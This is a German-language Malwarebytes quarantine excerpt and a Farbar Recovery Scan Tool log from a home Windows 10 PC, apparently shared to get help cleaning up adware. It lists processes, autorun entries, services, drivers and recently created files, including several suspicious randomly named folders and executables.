Adware.Elex, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\GD3E7.TMP, In Quarantäne, [1032], [369861],1.0.1252
Adware.Elex.Generic, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\G883A.TMP, In Quarantäne, [2145], [363837],1.0.1252
Adware.Tuto4PC, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\GLOBAL_INSTALLER.EXE, In Quarantäne, [2320], [350730],1.0.1252
PUP.Optional.BrowserAir, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\BROWSERAIR.EXE, In Quarantäne, [1852], [185986],1.0.1252
Adware.Tuto4PC, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\EQMVNUA.EXE, In Quarantäne, [2320], [350731],1.0.1252
Adware.Elex, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\GCEF9.TMP.EXE, In Quarantäne, [1032], [361532],1.0.1252
PUP.Optional.YesSearches, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\51ACFBBD3004450E934B7AD1EE57DF84\BCN_MY.EXE, In Quarantäne, [129], [124490],1.0.1252
Trojan.SelfDelete, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\IS-HD85F.TMP\SAM__9286_IL509C.EXE, In Quarantäne, [141], [370269],1.0.1252
PUP.Optional.AppTrailers, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\WUCBEIQ9Z\APPTRAILERS.9.2.9AMT.EXE, In Quarantäne, [1066], [338239],1.0.1252
PUP.Optional.AppTrailers, C:\WINDOWS\TEMP\C848.TMP, In Quarantäne, [1066], [338239],1.0.1252
PUP.Optional.Linkury, C:\WINDOWS\TEMP\SMARTBAR\TAMSTOCK.ICO, In Quarantäne, [397], [259312],1.0.1252
PUP.Optional.Linkury, C:\Windows\Temp\Smartbar\Black-Lam.ico, In Quarantäne, [397], [259312],1.0.1252
PUP.Optional.Linkury, C:\Windows\Temp\Smartbar\Onto-Core.ico, In Quarantäne, [397], [259312],1.0.1252
PUP.Optional.Linkury, C:\Windows\Temp\Smartbar\Zuntam.ico, In Quarantäne, [397], [259312],1.0.1252
Adware.Tuto4PC, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\7P4GD2Z08H\WELOVEYOU.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\90PEPS0VGU\WELOVEYOU.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\CQVHJCNVN\CQVHJCNVN.EXE, In Quarantäne, [2320], [350732],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\PROGRAM FILES (X86)\COMMON FILES\Y-OVETIP\INSTALLATIONCONFIGURATION.XML, In Quarantäne, [96], [302562],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Y-ovetip\uninstall.dat, In Quarantäne, [96], [302562],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Y-ovetip\uninstall.exe, In Quarantäne, [96], [302562],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Y-ovetip\uninstall.ico, In Quarantäne, [96], [302562],1.0.1252
PUP.Optional.Goobzo, C:\WINDOWS\SYSTEM32\TASKS\SMW_UpdateTask_Time_323832303833353732332d374a55414134502a576c4a5a, In Quarantäne, [434], [189916],1.0.1252
Adware.Tuto4PC, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\7P4GD2Z08H\DISPLAY.EXE, In Quarantäne, [2320], [350732],1.0.1252
Adware.Tuto4PC, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\90PEPS0VGU\DISPLAY.EXE, In Quarantäne, [2320], [350732],1.0.1252
PUP.Optional.YesSearches, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\D7VZAKDZQ\D7VZAKDZQ.EXE, In Quarantäne, [129], [124490],1.0.1252
PUP.Optional.SystemHealer, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\C962BA9A7DD9438B9B17915CC13F3B73\SYSTEMHEALER.EXE, In Quarantäne, [1225], [363442],1.0.1252
Trojan.Agent.WR, C:\USERS\BARBARA\APPDATA\LOCAL\TEMP\NIRNPDUSZ\LINKER.EXE, In Quarantäne, [3146], [368063],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\PROGRAM FILES (X86)\COMMON FILES\FIXZAP\INSTALLATIONCONFIGURATION.XML, In Quarantäne, [96], [302566],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Fixzap\uninstall.dat, In Quarantäne, [96], [302566],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Fixzap\uninstall.exe, In Quarantäne, [96], [302566],1.0.1252
PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Fixzap\uninstall.ico, In Quarantäne, [96], [302566],1.0.1252

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

(end)

frst.txt

FRST Logfile:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 12-02-2017
durchgeführt von Barbara (Administrator) auf BARBARA-PC (13-02-2017 20:48:04)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Geladene Profile: Barbara (Verfügbare Profile: Barbara)
Platform: Windows 10 Pro Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Apple Computer, Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files\PDR238V39I\22XHB7149.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
() C:\Program Files\XPQ0UG79CA\XPQ0UG79C.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeHost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-23] (Microsoft Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify Web Helper] => C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1444976 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify] => C:\Users\Barbara\AppData\Roaming\Spotify\Spotify.exe [7153264 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Steam] => c:\Program Files (x86)\Steam\steam.exe [2851408 2016-07-09] (Valve Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [ZJy9zt07Me] => C:\Program Files\PDR238V39I\22XHB7149.exe [370176 2017-02-13] ()
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [HGFI7viJwx] => C:\Program Files\XPQ0UG79CA\XPQ0UG79C.exe [370176 2017-02-13] ()
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)
ShellExecuteHooks: Kein Name - {12BEB57E-ECD3-11E6-A98A-64006A5CFC23} - C:\Users\Barbara\AppData\Roaming\Zrshfcit\Griotain.dll -> Keine Datei

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{92a07177-073c-4d90-93ea-d374613fc39e}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-07-30] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-07-30] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: 8rnx3iua.default
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default [2017-02-13]
FF Extension: (2020 3D Viewer for IKEA) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\2020Player_IKEA@2020Technologies.com [2016-12-16]
FF Extension: (Firefox Hotfix) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-01]
FF Extension: (Ghostery) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox@ghostery.com.xpi [2017-02-12]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)

Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 Bonjour Service; C:\Program Files (x86)\Bonjour\mDNSResponder.exe [229376 2006-02-28] (Apple Computer, Inc.) [Datei ist nicht signiert]
R2 Dalidom; C:\Program Files (x86)\Plidaing\Konoghstuqtainmodule.dll [154624 2017-02-12] () [Datei ist nicht signiert]
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-09-03] (Macrovision Europe Ltd.) [Datei ist nicht signiert]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-01-20] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2142728 2016-10-22] (Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [2209296 2016-10-22] (Electronic Arts)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176584 2017-02-13] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-13] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-13] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251848 2017-02-13] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-13] (Malwarebytes)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-01-20] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-01-20] (NVIDIA Corporation)
R2 Sentinel64; C:\WINDOWS\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
S3 SNTUSB64; C:\WINDOWS\System32\drivers\SNTUSB64.SYS [63528 2011-05-27] (SafeNet, Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S1 cvjjfjaa; \??\C:\WINDOWS\system32\drivers\cvjjfjaa.sys [X]
U3 idsvc; kein ImagePath

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 20:47 - 2017-02-13 20:47 - 00018791 _____ C:\Users\Barbara\Desktop\mbam.txt
2017-02-13 20:42 - 2017-02-13 20:45 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-02-13 20:42 - 2017-02-13 20:45 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-02-13 20:42 - 2017-02-13 20:45 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-02-13 20:42 - 2017-02-13 20:45 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-02-13 20:42 - 2017-02-13 20:42 - 00176584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-02-13 20:42 - 2017-02-13 20:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-02-13 20:42 - 2017-02-13 20:42 - 00000000 ____D C:\Program Files\Malwarebytes
2017-02-13 20:42 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-02-13 20:41 - 2017-02-13 20:41 - 00019083 _____ C:\Users\Barbara\Desktop\AdwCleaner[C0].txt
2017-02-13 20:41 - 2017-02-13 20:41 - 00000000 ____D C:\Users\Barbara\Desktop\alt
2017-02-13 20:19 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\XPQ0UG79CA
2017-02-13 20:14 - 2017-02-13 20:38 - 00000000 ____D C:\AdwCleaner
2017-02-13 20:13 - 2017-02-13 20:13 - 00000000 ____D C:\Program Files (x86)\pfqv62f8
2017-02-13 19:59 - 2017-02-13 19:59 - 07097928 _____ (VS Revo Group ) C:\Users\Barbara\Desktop\revo202setup.exe
2017-02-13 19:59 - 2017-02-13 19:59 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-02-13 19:59 - 2017-02-13 19:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-02-13 19:59 - 2017-02-13 19:59 - 00000000 ____D C:\Program Files\VS Revo Group
2017-02-13 19:19 - 2017-02-13 19:19 - 00000000 ____D C:\Program Files\PDR238V39I
2017-02-13 19:08 - 2017-02-13 20:42 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-02-13 19:07 - 2017-02-13 20:48 - 00000000 ____D C:\FRST
2017-02-13 19:06 - 2017-02-13 20:48 - 00000000 ____D C:\Users\Barbara\Desktop\Virenscanner etc
2017-02-12 22:16 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\8K5F5GX6AI
2017-02-12 22:15 - 2017-02-13 20:03 - 00000000 ____D C:\Program Files (x86)\vpF0TnTYqt
2017-02-12 22:14 - 2017-02-13 20:39 - 00000000 ____D C:\Program Files (x86)\Druciy
2017-02-12 22:14 - 2017-02-13 20:05 - 00000000 ____D C:\WINDOWS\system32\SSL
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Local\Reabation
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ___HD C:\ProgramData\108l42A89c7603
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\WR5TG73LV7
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\P3ZUK80JKY
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\IQ50062YNB
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files (x86)\BeCleaner
2017-02-12 22:13 - 2017-02-13 20:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Zrshfcit
2017-02-12 22:13 - 2017-02-12 22:13 - 00016812 _____ C:\WINDOWS\System32\Tasks\108l42A89c7603
2017-02-12 22:13 - 2017-02-12 22:13 - 00006098 _____ C:\WINDOWS\System32\Tasks\Atikationbogot System
2017-02-12 22:13 - 2017-02-12 22:13 - 00003782 _____ C:\WINDOWS\System32\Tasks\Pregehabering
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Qolther
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Ghuversp
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Thteckganoied
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Plidaing
2017-02-12 21:59 - 2017-02-12 22:08 - 70965739 _____ (eRightSoft ) C:\Users\Barbara\Downloads\SUPERsetup.exe
2017-02-11 17:30 - 2017-02-11 17:30 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash (1).themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash.themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 08635521 _____ C:\Users\Barbara\Downloads\DreamgardenChristinaManchenko.themepack
2017-02-10 16:16 - 2017-02-10 16:16 - 03287737 _____ C:\WINDOWS\fb8637bc1a4671a0ade9e7275e924c95.exe
2017-02-09 13:38 - 2017-02-12 20:33 - 00000000 ____D C:\WINDOWS\LastGood
2017-02-09 13:38 - 2017-02-09 13:38 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-02-09 13:38 - 2017-01-04 15:24 - 00222648 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-02-09 13:38 - 2016-12-29 13:43 - 00133056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-02-09 13:38 - 2016-09-09 19:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-02-09 13:38 - 2016-09-09 19:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-02-03 17:19 - 2017-02-03 17:19 - 00515204 _____ C:\WINDOWS\Minidump\020317-6328-01.dmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\Users\Barbara\AppData\Local\Chromium
2017-02-03 17:12 - 2017-01-20 19:39 - 00156608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00124352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-02-03 17:12 - 2017-01-20 14:36 - 00001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-01-26 18:15 - 2017-02-13 19:12 - 00001308 _____ C:\Users\Public\Desktop\ElsterFormular.lnk
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\elsterformular
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\ProgramData\elsterformular
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular Update Service
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular
2017-01-26 18:13 - 2017-01-26 18:15 - 67816592 _____ (Landesfinanzdirektion Thüringen) C:\Users\Barbara\Downloads\ElsterFormularPrivat.exe
2017-01-25 13:39 - 2016-12-21 08:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 13:39 - 2016-12-21 05:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 20:46 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA
2017-02-13 20:45 - 2016-09-23 02:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-13 20:45 - 2016-09-23 02:41 - 02372176 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-13 20:45 - 2016-07-16 23:51 - 00939196 _____ C:\WINDOWS\system32\perfh007.dat
2017-02-13 20:45 - 2016-07-16 23:51 - 00226418 _____ C:\WINDOWS\system32\perfc007.dat
2017-02-13 20:45 - 2016-07-16 07:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-02-13 20:38 - 2016-11-25 17:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-13 20:38 - 2016-07-30 09:24 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrashDumps
2017-02-13 20:36 - 2016-09-23 02:40 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-02-13 20:13 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-02-13 19:15 - 2016-11-26 12:11 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Mozilla
2017-02-13 19:13 - 2017-01-13 18:18 - 00002108 _____ C:\Users\Barbara\Desktop\Finanzplan 2017.lnk
2017-02-13 19:13 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\Performance
2017-02-13 19:12 - 2016-11-16 20:05 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-13 19:12 - 2016-09-23 02:43 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-02-13 19:12 - 2016-09-03 11:33 - 00001301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:33 - 00000970 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Stock Photos CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00001480 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit 2.lnk
